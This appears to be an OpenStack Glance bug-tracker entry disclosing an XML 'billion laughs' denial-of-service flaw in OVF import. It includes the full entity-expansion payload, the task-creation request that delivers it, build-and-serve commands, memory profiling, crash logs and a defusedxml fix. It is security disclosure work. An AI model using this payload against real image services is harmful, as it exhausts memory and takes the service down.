2016-09-20 00:18:50.236 12743 DEBUG glance_store.backend [-] Attempting to import store no_conf _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.239 12743 DEBUG glance_store.backend [-] Registering options for group glance_store register_opts /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:154
2016-09-20 00:18:50.243 12743 DEBUG glance_store.backend [-] Registering options for group glance_store register_opts /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:154
2016-09-20 00:18:50.244 12743 DEBUG glance_store.backend [-] Attempting to import store file _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.247 12743 DEBUG glance_store.capabilities [-] Store glance_store._drivers.filesystem.Store doesn't support updating dynamic storage capabilities. Please overwrite 'update_capabilities' method of the store to implement updating logics if needed. update_capabilities /usr/local/lib/python2.7/dist-packages/glance_store/capabilities.py:97
2016-09-20 00:18:50.269 12743 DEBUG glance.async.flows.introspect [-] Flow: import with ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac on <glance.api.authorization.ImageRepoProxy object at 0x7f066ecdbf90> get_flow /opt/stack/glance/glance/async/flows/introspect.py:92
2016-09-20 00:18:50.277 12743 DEBUG glance.async.flows.ovf_process [-] Flow: import with ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac on <glance.api.authorization.ImageRepoProxy object at 0x7f066ecdbf90> get_flow /opt/stack/glance/glance/async/flows/ovf_process.py:264
2016-09-20 00:18:50.691 12743 DEBUG glance.async.taskflow_executor [-] Flow 'import' (ead420f3-4e84-42e5-9a2b-c2b5752454f6) transitioned into state 'RUNNING' from state 'PENDING' _flow_receiver /usr/local/lib/python2.7/dist-packages/taskflow/listeners/logging.py:140
2016-09-20 00:18:50.719 12743 DEBUG glance.async.taskflow_executor [-] Task 'import-CreateImage-6da2d2bc-0bf1-4063-be3c-f571a3f8bcac' (44a2ebaa-6825-4539-a874-0e1bfd3a94c5) transitioned into state 'RUNNING' from state 'PENDING' _task_receiver /usr/local/lib/python2.7/dist-packages/taskflow/listeners/logging.py:189
2016-09-20 00:18:50.739 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property status for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.740 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property schema for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.742 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property file for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.745 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property direct_url for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.751 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property tags for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.753 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property locations for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.755 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property checksum for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.756 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property created_at for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.759 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property updated_at for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.761 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property visibility for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.763 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property self for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.765 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property min_disk for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.768 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property protected for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.769 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property min_ram for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.771 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property owner for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.772 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property virtual_size for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.774 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property id for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.776 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property size for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.848 12743 DEBUG oslo_messaging._drivers.amqpdriver [-] CAST unique_id: d07a0965d2fb40b895d029f52605e2de NOTIFY exchange 'glance' topic 'notifications.info' _send /usr/local/lib/python2.7/dist-packages/oslo_messaging/_drivers/amqpdriver.py:432
2016-09-20 00:18:50.854 12743 DEBUG glance.async.flows.base_import [-] Task 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac created image 586fe0b7-1b29-488a-a4b9-91958c446504 execute /opt/stack/glance/glance/async/flows/base_import.py:69
2016-09-20 00:18:50.876 12743 DEBUG glance.async.taskflow_executor [-] Task 'import-CreateImage-6da2d2bc-0bf1-4063-be3c-f571a3f8bcac' (44a2ebaa-6825-4539-a874-0e1bfd3a94c5) transitioned into state 'SUCCESS' from state 'RUNNING' with result '586fe0b7-1b29-488a-a4b9-91958c446504' _task_receiver /usr/local/lib/python2.7/dist-packages/taskflow/listeners/logging.py:178
2016-09-20 00:18:50.879 12743 DEBUG glance.async.taskflow_executor [-] Task 'import-ImportToFS-6da2d2bc-0bf1-4063-be3c-f571a3f8bcac' (2f07c300-65b4-4dd5-a93a-87eaf8d388c6) transitioned into state 'RUNNING' from state 'PENDING' _task_receiver /usr/local/lib/python2.7/dist-packages/taskflow/listeners/logging.py:189
2016-09-20 00:18:50.904 12743 DEBUG glance_store._drivers.filesystem [-] Wrote 10240 bytes to /home/stack/work/586fe0b7-1b29-488a-a4b9-91958c446504 with checksum e892216d1977d1a07a1898cbf9f99a38 add /usr/local/lib/python2.7/dist-packages/glance_store/_drivers/filesystem.py:706
2016-09-20 00:18:50.907 12743 DEBUG oslo_concurrency.processutils [-] Running cmd (subprocess): qemu-img info --output=json file:///home/stack/work/586fe0b7-1b29-488a-a4b9-91958c446504 execute /usr/local/lib/python2.7/dist-packages/oslo_concurrency/processutils.py:344
2016-09-20 00:18:52.582 12743 DEBUG oslo_concurrency.processutils [-] CMD "qemu-img info --output=json file:///home/stack/work/586fe0b7-1b29-488a-a4b9-91958c446504" returned: 0 in 1.676s execute /usr/local/lib/python2.7/dist-packages/oslo_concurrency/processutils.py:374
2016-09-20 00:18:52.633 12743 DEBUG glance.async.taskflow_executor [-] Task 'import-ImportToFS-6da2d2bc-0bf1-4063-be3c-f571a3f8bcac' (2f07c300-65b4-4dd5-a93a-87eaf8d388c6) transitioned into state 'SUCCESS' from state 'RUNNING' with result 'file:///home/stack/work/586fe0b7-1b29-488a-a4b9-91958c446504' _task_receiver /usr/local/lib/python2.7/dist-packages/taskflow/listeners/logging.py:178
2016-09-20 00:18:52.640 12743 DEBUG glance.async.taskflow_executor [-] Task 'import-OVF_Process-6da2d2bc-0bf1-4063-be3c-f571a3f8bcac' (da37d5f2-52bd-46ca-bfc4-13a0f926afd3) transitioned into state 'RUNNING' from state 'PENDING' _task_receiver /usr/local/lib/python2.7/dist-packages/taskflow/listeners/logging.py:189
2016-09-20 00:18:52.670 12743 WARNING glance.async.flows.ovf_process [-] OVF properties config file "ovf-metadata.json" was not found.
2016-09-20 00:19:08.116 12744 DEBUG eventlet.wsgi.server [-] (12744) accepted ('10.0.2.2', 51290) server /usr/local/lib/python2.7/dist-packages/eventlet/wsgi.py:868
2016-09-20 00:19:08.200 12744 DEBUG glance.api.middleware.version_negotiation [-] Determining version of request: POST /v2/tasks Accept: application/json process_request /opt/stack/glance/glance/api/middleware/version_negotiation.py:46
2016-09-20 00:19:08.203 12744 DEBUG glance.api.middleware.version_negotiation [-] Using url versioning process_request /opt/stack/glance/glance/api/middleware/version_negotiation.py:58
2016-09-20 00:19:08.206 12744 DEBUG glance.api.middleware.version_negotiation [-] Matched version: v2 process_request /opt/stack/glance/glance/api/middleware/version_negotiation.py:70
2016-09-20 00:19:08.208 12744 DEBUG glance.api.middleware.version_negotiation [-] new path /v2/tasks process_request /opt/stack/glance/glance/api/middleware/version_negotiation.py:71
2016-09-20 00:19:09.610 11832 INFO glance.common.wsgi [-] Removed dead child 12744
2016-09-20 00:19:09.661 11832 DEBUG glance.common.wsgi [-] No stale children _verify_and_respawn_children /opt/stack/glance/glance/common/wsgi.py:548
2016-09-20 00:19:09.681 11832 CRITICAL glance [-] OSError: [Errno 12] Cannot allocate memory
2016-09-20 00:19:09.681 11832 ERROR glance Traceback (most recent call last):
2016-09-20 00:19:09.681 11832 ERROR glance File "/usr/local/bin/glance-api", line 10, in <module>
2016-09-20 00:19:09.681 11832 ERROR glance sys.exit(main())
2016-09-20 00:19:09.681 11832 ERROR glance File "/opt/stack/glance/glance/cmd/api.py", line 92, in main
2016-09-20 00:19:09.681 11832 ERROR glance server.wait()
2016-09-20 00:19:09.681 11832 ERROR glance File "/opt/stack/glance/glance/common/wsgi.py", line 626, in wait
2016-09-20 00:19:09.681 11832 ERROR glance self.wait_on_children()
2016-09-20 00:19:09.681 11832 ERROR glance File "/opt/stack/glance/glance/common/wsgi.py", line 566, in wait_on_children
2016-09-20 00:19:09.681 11832 ERROR glance self._verify_and_respawn_children(pid, status)
2016-09-20 00:19:09.681 11832 ERROR glance File "/opt/stack/glance/glance/common/wsgi.py", line 558, in _verify_and_respawn_children
2016-09-20 00:19:09.681 11832 ERROR glance self.run_child()
2016-09-20 00:19:09.681 11832 ERROR glance File "/opt/stack/glance/glance/common/wsgi.py", line 639, in run_child
2016-09-20 00:19:09.681 11832 ERROR glance pid = os.fork()
2016-09-20 00:19:09.681 11832 ERROR glance OSError: [Errno 12] Cannot allocate memory
2016-09-20 00:19:09.681 11832 ERROR glance
g-api failed to start
-----------------------------------------
Mitigation
-----------------------------------------
Any instances of xml.etree should be replaced with their equivalent in a secure XML parsing library like defusedxml [4]
1: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L21-L24
2: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L184
3: https://docs.python.org/2/library/xml.html#xml-vulnerabilities
4: https://pypi.python.org/pypi/defusedxml
-----------------------------------------
Other
-----------------------------------------
Thanks to Rahul Nair from the OpenStack Security Project for bringing the ovf_process file to my attention in the first place. We are testing Glance for security defects as part of OSIC, using our API security testing tool called Syntribos (https://github.com/openstack/syntribos), and Bandit (which was used to discover this issue). |
|
2016-09-20 00:25:59 |
Charles Neill |
bug |
|
|
added subscriber Rahul U Nair |
2016-09-20 00:28:10 |
Charles Neill |
description |
Creating a task to import an OVA file with a malicious OVF file inside it will result in significant memory usage by the glance-api process.
This is caused by the use of the xml.etree module in ovf_process.py [1] [2] to process OVF images extracted from OVA files with ET.iterparse(). No validation is currently performed on the XML prior to parsing.
As outlined in the Python documentation, xml.etree is vulnerable to the "billion laughs" vulnerability when parsing untrusted input [3]
-----------------------------------------
Example request
-----------------------------------------
POST /v2/tasks HTTP/1.1
Host: localhost:1338
Connection: close
Accept-Encoding: gzip, deflate
Accept: application/json
User-Agent: python-requests/2.11.1
Content-Type: application/json
X-Auth-Token: [ADMIN TOKEN]
Content-Length: 287
{
"type": "import",
"input": {
"import_from": "http://127.0.0.1:9090/laugh.ova",
"import_from_format": "raw",
"image_properties": {
"disk_format": "raw",
"container_format": "ova",
"name": "laugh"
}
}
}
-----------------------------------------
Creating the malicious OVA/OVF
-----------------------------------------
"laugh.ova" can be created like so:
1. Copy this into a file called "laugh.ovf":
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
<!ENTITY lol10 "&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;">
]>
<lolz>&lol10;</lolz>
2. Create the OVA file (tarball) with the "tar" utility:
$ tar -cf laugh.ova.tar laugh.ovf && mv laugh.ova.tar laugh.ova
3. (Optional) If you want to serve this from your devstack instance (as in the request above), run this in the folder where you created the OVA file:
$ python -m SimpleHTTPServer 9090
-----------------------------------------
Performance impact
-----------------------------------------
Profiling my VM from a fresh boot:
$ vboxmanage metrics query [VM NAME] Guest/RAM/Usage/Free,Guest/Pagefile/Usage/Total,Guest/CPU/Load/User:avg
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 13.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 2456680 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
After submitting this task twice (repeating calls to the above command):
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1989684 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 88.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1694080 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 83.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1426876 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 79.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1181248 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 85.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 817244 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 548636 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 74.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 118932 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
After submitting enough of these requests at once, glance-api runs out of memory and can't restart itself. Here's what the log looks like after the "killer request":
2016-09-20 00:18:50.060 12743 INFO eventlet.wsgi.server [req-7b00a8f9-9fd6-4434-9c8b-87cc88ae2c06 1fadb086cfd94c1d8ab9d554657054d1 3330be90ba344c34b34afc27de7e7195 - default default] 10.0.2.2 - - [20/Sep/2016 00:18:50] "POST /v2/tasks HTTP/1.1" 201 796 4.892790
2016-09-20 00:18:50.076 12743 INFO glance.domain [-] Task [6da2d2bc-0bf1-4063-be3c-f571a3f8bcac] status changing from processing to processing
2016-09-20 00:18:50.083 12743 DEBUG oslo_messaging._drivers.amqpdriver [-] CAST unique_id: dcc1e3e9d69e4e69a3f1f3737fe62040 NOTIFY exchange 'glance' topic 'notifications.info' _send /usr/local/lib/python2.7/dist-packages/oslo_messaging/_drivers/amqpdriver.py:432
2016-09-20 00:18:50.120 12743 DEBUG glance.async.taskflow_executor [-] Taskflow executor picked up the execution of task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac of task type import _run /opt/stack/glance/glance/async/taskflow_executor.py:152
2016-09-20 00:18:50.202 12743 DEBUG glance_store.backend [-] Attempting to import store glance.store.sheepdog.Store _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.204 12743 DEBUG glance_store.backend [-] Attempting to import store rbd _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.207 12743 DEBUG glance_store.backend [-] Attempting to import store http _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.210 12743 DEBUG glance_store.backend [-] Attempting to import store file _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.214 12743 DEBUG glance_store.backend [-] Attempting to import store glance.store.http.Store _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.215 12743 DEBUG glance_store.backend [-] Attempting to import store glance.store.rbd.Store _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.218 12743 DEBUG glance_store.backend [-] Attempting to import store vmware _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.220 12743 DEBUG glance_store.backend [-] Attempting to import store glance.store.cinder.Store _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.222 12743 DEBUG glance_store.backend [-] Attempting to import store glance.store.filesystem.Store _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.223 12743 DEBUG glance_store.backend [-] Attempting to import store cinder _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.225 12743 DEBUG glance_store.backend [-] Attempting to import store glance.store.swift.Store _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.227 12743 DEBUG glance_store.backend [-] Attempting to import store swift _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.230 12743 DEBUG glance_store.backend [-] Attempting to import store glance.store.vmware_datastore.Store _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.233 12743 DEBUG glance_store.backend [-] Attempting to import store sheepdog _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.236 12743 DEBUG glance_store.backend [-] Attempting to import store no_conf _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.239 12743 DEBUG glance_store.backend [-] Registering options for group glance_store register_opts /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:154
2016-09-20 00:18:50.243 12743 DEBUG glance_store.backend [-] Registering options for group glance_store register_opts /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:154
2016-09-20 00:18:50.244 12743 DEBUG glance_store.backend [-] Attempting to import store file _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.247 12743 DEBUG glance_store.capabilities [-] Store glance_store._drivers.filesystem.Store doesn't support updating dynamic storage capabilities. Please overwrite 'update_capabilities' method of the store to implement updating logics if needed. update_capabilities /usr/local/lib/python2.7/dist-packages/glance_store/capabilities.py:97
2016-09-20 00:18:50.269 12743 DEBUG glance.async.flows.introspect [-] Flow: import with ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac on <glance.api.authorization.ImageRepoProxy object at 0x7f066ecdbf90> get_flow /opt/stack/glance/glance/async/flows/introspect.py:92
2016-09-20 00:18:50.277 12743 DEBUG glance.async.flows.ovf_process [-] Flow: import with ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac on <glance.api.authorization.ImageRepoProxy object at 0x7f066ecdbf90> get_flow /opt/stack/glance/glance/async/flows/ovf_process.py:264
2016-09-20 00:18:50.691 12743 DEBUG glance.async.taskflow_executor [-] Flow 'import' (ead420f3-4e84-42e5-9a2b-c2b5752454f6) transitioned into state 'RUNNING' from state 'PENDING' _flow_receiver /usr/local/lib/python2.7/dist-packages/taskflow/listeners/logging.py:140
2016-09-20 00:18:50.719 12743 DEBUG glance.async.taskflow_executor [-] Task 'import-CreateImage-6da2d2bc-0bf1-4063-be3c-f571a3f8bcac' (44a2ebaa-6825-4539-a874-0e1bfd3a94c5) transitioned into state 'RUNNING' from state 'PENDING' _task_receiver /usr/local/lib/python2.7/dist-packages/taskflow/listeners/logging.py:189
2016-09-20 00:18:50.739 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property status for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.740 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property schema for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.742 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property file for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.745 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property direct_url for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.751 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property tags for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.753 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property locations for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.755 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property checksum for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.756 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property created_at for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.759 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property updated_at for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.761 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property visibility for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.763 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property self for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.765 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property min_disk for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.768 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property protected for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.769 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property min_ram for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.771 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property owner for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.772 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property virtual_size for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.774 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property id for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.776 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property size for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.848 12743 DEBUG oslo_messaging._drivers.amqpdriver [-] CAST unique_id: d07a0965d2fb40b895d029f52605e2de NOTIFY exchange 'glance' topic 'notifications.info' _send /usr/local/lib/python2.7/dist-packages/oslo_messaging/_drivers/amqpdriver.py:432
2016-09-20 00:18:50.854 12743 DEBUG glance.async.flows.base_import [-] Task 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac created image 586fe0b7-1b29-488a-a4b9-91958c446504 execute /opt/stack/glance/glance/async/flows/base_import.py:69
2016-09-20 00:18:50.876 12743 DEBUG glance.async.taskflow_executor [-] Task 'import-CreateImage-6da2d2bc-0bf1-4063-be3c-f571a3f8bcac' (44a2ebaa-6825-4539-a874-0e1bfd3a94c5) transitioned into state 'SUCCESS' from state 'RUNNING' with result '586fe0b7-1b29-488a-a4b9-91958c446504' _task_receiver /usr/local/lib/python2.7/dist-packages/taskflow/listeners/logging.py:178
2016-09-20 00:18:50.879 12743 DEBUG glance.async.taskflow_executor [-] Task 'import-ImportToFS-6da2d2bc-0bf1-4063-be3c-f571a3f8bcac' (2f07c300-65b4-4dd5-a93a-87eaf8d388c6) transitioned into state 'RUNNING' from state 'PENDING' _task_receiver /usr/local/lib/python2.7/dist-packages/taskflow/listeners/logging.py:189
2016-09-20 00:18:50.904 12743 DEBUG glance_store._drivers.filesystem [-] Wrote 10240 bytes to /home/stack/work/586fe0b7-1b29-488a-a4b9-91958c446504 with checksum e892216d1977d1a07a1898cbf9f99a38 add /usr/local/lib/python2.7/dist-packages/glance_store/_drivers/filesystem.py:706
